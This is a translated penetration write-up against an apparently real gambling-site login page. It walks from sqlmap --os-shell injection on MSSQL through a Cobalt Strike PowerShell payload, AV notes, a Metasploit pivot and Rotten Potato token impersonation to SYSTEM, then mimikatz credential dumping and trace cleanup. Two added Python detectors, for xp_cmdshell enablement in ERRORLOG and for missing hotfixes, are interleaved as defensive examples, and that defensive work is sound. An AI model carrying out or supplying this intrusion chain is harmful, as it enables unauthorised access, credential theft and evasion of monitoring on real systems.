Penetration practice - sqlserver empowerment
2022-07-04 03:43:00 【amingMM】
Technical points:
Bypassing Alibaba Cloud Shield (Yundun)
Getting a CS / MSF session
0x00 Prerequisites
Login page of a BC site
Run sqlmap directly against it for blind SQL injection
sqlmap -u "http://127.0.0.1/Login/index" --form --batch --os-shell
Got an os-shell
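On MSSQL, sqlmap's --os-shell works through xp_cmdshell and turns it on with sp_configure when it is disabled; SQL Server writes every sp_configure change to the ERRORLOG as "Configuration option '<name>' changed from <old> to <new>". The following detector is an added example, not part of the original write-up: it scans ERRORLOG text for the options that must flip for this step to succeed. The log lines are constructed for the demo.

```python
"""Flag SQL Server ERRORLOG entries that show xp_cmdshell (or its prerequisites)
being switched on. Added example; the log excerpt below is constructed."""
import re
from typing import Dict, List, Set

# sp_configure logs one line per option change; we match the fixed wording.
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+spid(?P<spid>\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose 0 -> 1 transition opens a path from T-SQL to the operating system.
WATCHED_OPTIONS = {
    "xp_cmdshell": "OS command execution from T-SQL enabled",
    "show advanced options": "advanced options exposed (always precedes xp_cmdshell)",
    "Ole Automation Procedures": "sp_OACreate / sp_OAMethod enabled",
}

# Constructed sample: one benign change, one enable/disable pair, one non-spid line.
SAMPLE_ERRORLOG = """\
2022-07-03 21:40:01.12 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-07-03 21:40:01.30 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-07-03 21:41:10.02 spid52      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2022-07-03 21:45:00.00 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-07-03 21:50:00.00 Server      SQL Server is now ready for client connections.
"""


def find_enablements(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per watched option that changes from 0 to 1."""
    findings = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        option = m.group("option")
        if option in WATCHED_OPTIONS and m.group("old") == "0" and m.group("new") == "1":
            findings.append({
                "time": m.group("ts"),
                "spid": m.group("spid"),
                "option": option,
                "why": WATCHED_OPTIONS[option],
            })
    return findings


def sessions_enabling_xp_cmdshell(log_text: str) -> Set[str]:
    """SPIDs that turned xp_cmdshell on, to join against login auditing."""
    return {f["spid"] for f in find_enablements(log_text) if f["option"] == "xp_cmdshell"}


if __name__ == "__main__":
    for f in find_enablements(SAMPLE_ERRORLOG):
        print(f"{f['time']} spid{f['spid']}: {f['option']} -> {f['why']}")
```

The 1 -> 0 line is deliberately ignored: re-disabling xp_cmdshell afterwards is what an attacker's cleanup looks like, and the earlier 0 -> 1 event is the one worth alerting on. Joining the SPID with the login audit identifies which SQL login (here, the web application's) performed the change.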
0x01 Getting a CS session
Cobalt Strike
● Create a listener
Generate a PowerShell command payload
Run it in the os-shell command line obtained above
● Check permissions
The current shell runs only as nt service\mssqlserver, a very low-privilege service account (it does, however, hold SeImpersonatePrivilege, which is what the potato step below relies on)
0x02 Privilege escalation
● Check the installed patches
Hotfixes: 154 hotfixes installed.
[01]: KB2959936
[02]: KB3191564
[03]: KB2896496
[04]: KB2919355
[05]: KB2920189
[06]: KB2928120
[07]: KB2931358
[08]: KB2931366
[09]: KB2933826
[10]: KB2938066
[11]: KB2938772
[12]: KB2949621
[13]: KB2954879
[14]: KB2958262
[15]: KB2958263
[16]: KB2961072
[17]: KB2965500
[18]: KB2966407
[19]: KB2967917
[20]: KB2971203
[21]: KB2971850
[22]: KB2973351
[23]: KB2973448
[24]: KB2975061
[25]: KB2976627
[26]: KB2977629
[27]: KB2981580
[28]: KB2987107
[29]: KB2989647
[30]: KB2989930
[31]: KB2998527
[32]: KB3000850
[33]: KB3003057
[34]: KB3004545
[35]: KB3008242
[36]: KB3011780
[37]: KB3012702
[38]: KB3013172
[39]: KB3013410
[40]: KB3013538
[41]: KB3013769
[42]: KB3013791
[43]: KB3013816
[44]: KB3014442
[45]: KB3019978
[46]: KB3021674
[47]: KB3023266
[48]: KB3024751
[49]: KB3024755
[50]: KB3027209
[51]: KB3030947
[52]: KB3031044
[53]: KB3033446
[54]: KB3034348
[55]: KB3035126
[56]: KB3036612
[57]: KB3038002
[58]: KB3042058
[59]: KB3042085
[60]: KB3043812
[61]: KB3044374
[62]: KB3044673
[63]: KB3045634
[64]: KB3045685
[65]: KB3045717
[66]: KB3045719
[67]: KB3045755
[68]: KB3045999
[69]: KB3046017
[70]: KB3046737
[71]: KB3048043
[72]: KB3054169
[73]: KB3054203
[74]: KB3054256
[75]: KB3054464
[76]: KB3055323
[77]: KB3055343
[78]: KB3055642
[79]: KB3059317
[80]: KB3060681
[81]: KB3060793
[82]: KB3061512
[83]: KB3063843
[84]: KB3071756
[85]: KB3077715
[86]: KB3078405
[87]: KB3078676
[88]: KB3080149
[89]: KB3081320
[90]: KB3082089
[91]: KB3084135
[92]: KB3084905
[93]: KB3086255
[94]: KB3087137
[95]: KB3091297
[96]: KB3092601
[97]: KB3092627
[98]: KB3094486
[99]: KB3095701
[100]: KB3099834
[101]: KB3100473
[102]: KB3102429
[103]: KB3102939
[104]: KB3103616
[105]: KB3103696
[106]: KB3103709
[107]: KB3109103
[108]: KB3109976
[109]: KB3110329
[110]: KB3115224
[111]: KB3121261
[112]: KB3123245
[113]: KB3126041
[114]: KB3126434
[115]: KB3126587
[116]: KB3126593
[117]: KB3132080
[118]: KB3133043
[119]: KB3133690
[120]: KB3134179
[121]: KB3134815
[122]: KB3137728
[123]: KB3138602
[124]: KB3139164
[125]: KB3139398
[126]: KB3139914
[127]: KB3140219
[128]: KB3140234
[129]: KB3144850
[130]: KB3145384
[131]: KB3145432
[132]: KB3146604
[133]: KB3146723
[134]: KB3146751
[135]: KB3147071
[136]: KB3149157
[137]: KB3155784
[138]: KB3156059
[139]: KB3159398
[140]: KB3161949
[141]: KB3162343
[142]: KB3172614
[143]: KB3172729
[144]: KB3175024
[145]: KB3178539
[146]: KB3179574
[147]: KB3185319
[148]: KB4033428
[149]: KB4483187
[150]: KB4486105
[151]: KB4486107
[152]: KB5001403
[153]: KB5007154
[154]: KB5008263
Network cards: 1 NIC installed.
[01]: Red Hat VirtIO Ethernet Adapter
Connection name: Ethernet
DHCP enabled: Yes
Try MS16-075
Check the AV
https://mrxn.net/avlist/
Alibaba Cloud Shield (Yundun) is present
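The patch inventory above is what a defender should be comparing against a baseline before an attacker does. The following is an added example, not code from the original write-up: it parses the Hotfix(s) section of `systeminfo` output (the English form of the list shown above), verifies that the number of parsed entries matches the declared count so a truncated capture is noticed, and reports which updates from a required baseline are absent. The KB numbers in REQUIRED_KBS are placeholders for an organisation's own baseline and are not the fix for any particular bulletin; the systeminfo excerpt is constructed.

```python
"""Parse `systeminfo` hotfix output and audit it against a patch baseline.
Added example; the sample output and the baseline KBs are constructed/placeholders."""
import re
from typing import Set, Tuple

HEADER = re.compile(r"^\s*Hotfix\(s\):\s+(\d+)\s+Hotfix\(s\) Installed\.", re.M)
ENTRY = re.compile(r"^\s*\[\d+\]:\s+(KB\d+)\s*$", re.M)

# Placeholder baseline: KB0000000 is deliberately fictitious so the sample reports a gap.
REQUIRED_KBS = {"KB5007154", "KB5008263", "KB0000000"}

# Constructed excerpt in the layout systeminfo prints (first four KBs taken from the page).
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows Server
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB3191564
                           [03]: KB5007154
                           [04]: KB5008263
Network Card(s):           1 NIC(s) Installed.
                           [01]: Red Hat VirtIO Ethernet Adapter
"""


def installed_hotfixes(text: str) -> Tuple[Set[str], int]:
    """Return (installed KBs, declared count). Declared count is -1 if no header."""
    header = HEADER.search(text)
    if not header:
        return set(), -1
    body = text[header.end():]
    # The list ends at the next field that starts in column 0, e.g. "Network Card(s):".
    nxt = re.search(r"^\S", body, re.M)
    section = body[:nxt.start()] if nxt else body
    return set(ENTRY.findall(section)), int(header.group(1))


def audit(text: str, required: Set[str]) -> dict:
    """Compare installed hotfixes with a baseline and flag incomplete captures."""
    installed, declared = installed_hotfixes(text)
    return {
        "installed": installed,
        "declared": declared,
        # Fewer parsed entries than declared means the output was cut off or a
        # line did not parse; do not trust the "missing" set in that case.
        "truncated": declared >= 0 and len(installed) != declared,
        "missing": set(required) - installed,
    }


if __name__ == "__main__":
    report = audit(SAMPLE_SYSTEMINFO, REQUIRED_KBS)
    print(f"{len(report['installed'])}/{report['declared']} hotfixes parsed, "
          f"truncated={report['truncated']}, missing={sorted(report['missing'])}")
```

In practice the baseline set comes from the patch-management system rather than a literal in the script, and the truncation check matters because systeminfo output pasted from a shell is often cut short, which would otherwise be reported as a long list of missing updates.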
0x03 Pivoting to MSF
● Create a new payload
Choose Foreign HTTP
Use it in msf
● New session in CS
Select the session and spawn it to the foreign listener
Wait in msf for the session to connect (note: it seems a session whose user carries a domain prefix cannot be spawned)
Privileges are still very low; upload Rotten Potato through the CS file browser
● In the current session, start escalating:
cd C:\\Users\\Public
use incognito
execute -cH -f ./potato.exe
list_tokens -u
Copy the administrator token
impersonate_token "<administrator token copied above>"
Got SYSTEM privileges
0x04 Dumping hashes
load mimikatz
creds_all
Or use the module that ships with msf: run post/windows/gather/smart_hashdump
Log in directly
0x05 Clean up traces